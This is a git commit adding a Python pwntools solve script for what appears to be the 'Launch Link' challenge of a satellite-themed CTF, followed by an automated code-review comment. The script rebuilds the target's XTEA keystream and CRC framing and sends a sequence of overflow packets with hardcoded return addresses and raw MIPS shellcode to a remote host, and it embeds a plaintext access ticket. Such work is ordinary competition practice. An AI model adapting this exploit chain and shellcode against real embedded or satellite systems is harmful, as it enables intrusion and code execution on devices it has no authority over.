
Commit 7f5c1b9

authoredJun 2, 2020
launch link solve script
1 parent f2783b5 commit 7f5c1b9


1 file changed

+181
-0
lines changed

 
+181
@@ -0,0 +1,181 @@
1+
from pwn import *
2+
import time
3+
import binascii
4+
import os
5+
6+
key = 0x2E92F6BA62F88828147C0E2AE361D32C
7+
iv1 = 0xCD4A05E8A0A3C10F
8+
iv2 = 0x4CD435388058EFC7
9+
10+
def key_get(key, idx):
11+
return (key >> (idx*32)) & 0xffffffff
12+
13+
def xtea_do(data, key):
14+
v0 = data & 0xffffffff
15+
v1 = data >> 32
16+
sum = 0x3e778b90
17+
while sum != 0x7cef1720:
18+
temp = (sum + key_get(key, sum & 3)) & 0xffffffff
19+
sum = (sum + 0x83e778b9) & 0xffffffff
20+
v0 = (v0 + (temp ^ (v1 << 4 ^ v1 >> 5) + v1)) & 0xffffffff
21+
v1 = (v1 + (sum + (key_get(key, (sum >> 9 & 0xc) // 4)) ^ (v0 * 0x10 ^ v0 >> 5) + v0)) & 0xffffffff
22+
return (v1 << 32) | v0
23+
24+
def get_keystream_resource_rll(key, length):
25+
global iv2
26+
stream = b""
27+
for i in range(length):
28+
select = i & 7
29+
if select == 0:
30+
iv2 = xtea_do(iv2, key)
31+
stream += bytes([(iv2 >> (select*8)) & 0xff])
32+
return stream
33+
34+
def get_keystream_mac_rll(key, length):
35+
global iv1
36+
stream = b""
37+
for i in range(length):
38+
select = i & 7
39+
if select == 0:
40+
iv1 = xtea_do(iv1, key)
41+
stream += bytes([(iv1 >> (select*8)) & 0xff])
42+
return stream
43+
44+
def encrypt_message(msg):
45+
stream = get_keystream_mac_rll(key, len(msg))
46+
ret = b""
47+
for i in range(len(msg)):
48+
ret += bytes([stream[i] ^ msg[i]])
49+
return ret
50+
51+
def decrypt_message(msg):
52+
stream = get_keystream_resource_rll(key, len(msg))
53+
ret = b""
54+
for i in range(len(msg)):
55+
ret += bytes([stream[i] ^ msg[i]])
56+
return ret
57+
58+
def crc16(data: bytes, poly=0x8408):
59+
data = bytearray(data)
60+
crc = 0xFFFF
61+
for b in data:
62+
cur_byte = 0xFF & b
63+
for _ in range(0, 8):
64+
if (crc & 0x0001) ^ (cur_byte & 0x0001):
65+
crc = (crc >> 1) ^ poly
66+
else:
67+
crc >>= 1
68+
cur_byte >>= 1
69+
crc = (~crc & 0xFFFF)
70+
crc = (crc << 8) | ((crc >> 8) & 0xFF)
71+
return crc & 0xFFFF
72+
73+
cur_size = 0x20
74+
75+
def set_size_block(size):
76+
global cur_size
77+
data = bytes([size])
78+
data += b"A"*(cur_size-4)
79+
payload = b"\x79" + p16(crc16(data)) + data
80+
cur_size = size
81+
return payload
82+
83+
def message_block(data):
84+
if len(data) < cur_size - 3:
85+
fill = cur_size - 3 - len(data)
86+
#data += cyclic(0x500)[:fill]
87+
data += b"A"*fill
88+
if data[0] == 0x73 or data[0] == 0xc3:
89+
data = bytes([data[0]]) + encrypt_message(data[1:])
90+
crcl = crc16(data)
91+
sice = b"\xe3" + p16(crcl) + data
92+
return sice
93+
94+
def reset():
95+
global cur_size
96+
data = b"A"*(cur_size-3)
97+
crcl = crc16(data)
98+
sice = b"\x13" + p16(crcl) + data
99+
cur_size = 0x20
100+
return sice
101+
102+
res = []
103+
res.append(set_size_block(0xc0))
104+
res.append(message_block(b"\x17" + b"\x70" + b"B"))
105+
#res.append(message_block(b"\xc3\x01" + p32(0x0) + b"\x20" + b"CCCCDDDDEEEEFFFF"))
106+
#res.append(reset())
107+
# 0x73 packet
108+
# uint16 sn
109+
#
110+
res.append(message_block(b"\x73\x0f\x80\x23" + b"\xfe"*0x10 + b"B"*0xa9))
111+
res.append(message_block(b"\x73\x0e\x80\x23" + b"\xfe"*0x10 + b"B"*0xa9))
112+
res.append(message_block(b"\x73\x0d\x80\x23" + b"\xfe"*0x10 + b"B"*0xa9))
113+
res.append(message_block(b"\x73\x0c\x80\x23" + b"\xfe"*0x10 + b"B"*0xa9))
114+
res.append(message_block(b"\x73\x0b\x80\x23" + b"\xfe"*0x10 + b"C"*0xa9))
115+
res.append(message_block(b"\x73\x0a\x80\x23" + b"\xfe"*0x10 + b"C"*0xa9))
116+
res.append(message_block(b"\x73\x09\x80\x23" + b"\xfe"*0x10 + b"C"*0xa9))
117+
res.append(message_block(b"\x73\x08\x80\x23" + b"\xfe"*0x10 + b"C"*0xa9))
118+
# 0x69696969 at a00fe778
119+
# jump to a00fe77c
120+
payload = b"\x73\x07\x80\x23\xfe" + b"\x00\x00\x00\x00"*4 + b"\xfe"*(0x10-5-4-4) + b"A"*0x1
121+
payload += p32(0xa0110308)
122+
#payload += b"\xFE\xFF\x00\x10" # shellchode
123+
payload += b"\x00\x00\x00\x00"*0x5
124+
payload += b"B"*(0xbd - len(payload))
125+
# ram buffer 1 - a0110304
126+
# jmp to a0110304 + 4
127+
res.append(message_block(payload))
128+
res.append(message_block(b"\x73\x06\x80\x23" + b"\xfe"*(0x10) + b"F"*0xa9))
129+
res.append(message_block(b"\x73\x05\x80\x23\xfe" + b"\xfe\xff\x00\x10" + b"\xfe"*(0x10-5) + b"G"*0xa9))
130+
res.append(message_block(b"\x73\x04\x80\x23" + b"\xfe"*0x10 + b"H"*0xa9))
131+
res.append(message_block(b"\x73\x03\x80\x23" + b"\xfe"*0x10 + b"A"*0xa9))
132+
res.append(message_block(b"\x73\x02\x80\x23" + b"\xfe"*0x10 + b"A"*0xa9))
133+
res.append(message_block(b"\x73\x01\x80\x23" + b"\xfe"*0x10 + b"A"*0xa9))
134+
#shellchode = b"\x00\x00\x00\x00" + b"\xFF\xFF\x00\x10"
135+
# bigly communication function = 0xbfc08cbc
136+
# global data buf 0xa00fecfc
137+
shellchode = b"\x00\x00\x07\x24\x04\x00\xA7\xAF\x04\x00\xA7\x8F\x20\x00\x09\x24\x17\x00\x27\x11\x00\x00\x00\x00\x00\x82\x02\x34\x00\x14\x02\x00\x00\x80\x42\x34\x80\x60\x07\x00\x20\x10\x4C\x00\x01\x00\xE7\x20\x04\x00\xA7\xAF\x00\x00\x43\x8C\x00\x00\xA3\xAF\x0F\xA0\x04\x34\x00\x24\x04\x00\xFC\xEC\x84\x34\x25\x28\xA0\x03\x26\x30\xC6\x00\x04\x00\x06\x24\xC0\xBF\x0B\x34\x00\x5C\x0B\x00\xBC\x8C\x6B\x35\x09\xF8\x60\x01\x00\x00\x00\x00\xE7\xFF\x00\x10\x00\x00\x00\x00"
138+
shellchode += b"\x00\x00\x00\x00"
139+
shellchode += b"\xFF\xFF\x00\x10"
140+
assert len(shellchode) < 0xb6
141+
shellchode += b"\x00"*(0xb6 - len(shellchode))
142+
res.append(message_block(b"\x73\x00\x80\x23\xfe\xfe\xfe" + shellchode))
143+
144+
145+
id1 = 0xef2c9fd1
146+
147+
#res.append(message_block(b"\xc3\x01" + p32(id1) + b"\xb0"*5))
148+
#res.append(message_block(b"\xc3\x01" + p32(id1) + b"\xb0"*5))
149+
#res.append(message_block(b"\xc3\x01" + p32(id1) + b"\xb0"*5))
150+
#res.append(message_block(b"\xc3\x01" + p32(id1) + b"\xb0"*5))
151+
#res.append(message_block(b"\xc3\x01" + p32(id1) + b"\xb0"*5))
152+
#res.append(message_block(b"\xc3\x01" + p32(id1) + b"\xb0"*5))
153+
#res.append(message_block(b"\xc3\x01" + p32(id1) + b"\xb0"*5))
154+
#res.append(message_block(b"\xc3\x01" + p32(id1) + b"\xb0"*5))
155+
#res.append(message_block(b"\xc3\x01" + p32(id1) + b"\xb0"*5))
156+
#res.append(message_block(b"\xc3\x01" + p32(id1) + b"\xb0"*5))
157+
#res.append(message_block(b"\xc3\x01" + p32(id1) + b"\xb0"*5))
158+
#res.append(message_block(b"\xc3\x00\x00" + b"\x02"*0x10))
159+
#res.append(message_block(b"\x73" + encrypt_message(b"\x00\x00\x00")))
160+
#res.append(message_block(b"\xc3\x02" + p32(0x0) + b"\x20" + b"CCCCDDDDEEEEFFFF"))
161+
#res.append(message_block(b"\x17" + b"\x70" + b"B"))
162+
#res.append(message_block(b"\x73\x44\x44" + b"\x23"*0x30))
163+
#res.append(message_block(b"\xc3" + encrypt_message(b"\x01AAAAAAAA")))
164+
165+
#r = process(["./vmips_patched", "-o", "memsize=2097152", "challenge_patched.rom"])
166+
#r = process(["./vmips_patched", "-o", "memsize=2097152", "challenge.rom"])
167+
#r = process(["./vmips", "-o", "memsize=2097152", "challenge_patched.rom"])
168+
#r = process(["./vmips", "-o", "memsize=2097152", "challenge.rom"])
169+
r = remote("launchlink.satellitesabove.me",5065)
170+
r.recvline()
171+
r.sendline("ticket{xray25235hotel:GFNqIcfJ-QGCTwRRjocGhg_tpNDdbbbj8jgH99WUW1_AGkw6Dlo_uEn9jf6K3i7DYw}")
172+
time.sleep(1)
173+
"""
174+
r.recvuntil("*************RESET*************")
175+
r.recvline()
176+
r.recvline()
177+
"""
178+
for i in res:
179+
r.send(i)
180+
time.sleep(0.2)
181+
r.interactive()
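Review bot: The `ticket{...}` string passed to `r.sendline(...)` right after the `remote(...)` connect is a live access credential committed in clear text; it should be read from the environment so the script can be shared and the value rotated without a history rewrite. `os` is already imported but unused, so the line can become `r.sendline(os.environ["LAUNCHLINK_TICKET"].encode())` (the variable name is a suggested one), which also avoids relying on pwntools' implicit text-to-bytes conversion. In `xtea_do` the loop accumulator named `sum` shadows the builtin; renaming it to `acc` keeps the function readable with no change in behaviour. `message_block` only pads when the input is shorter than `cur_size - 3` and passes longer inputs through unchecked, so an `assert len(data) <= cur_size - 3` before the padding branch would surface a sizing mistake at build time rather than on the wire.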
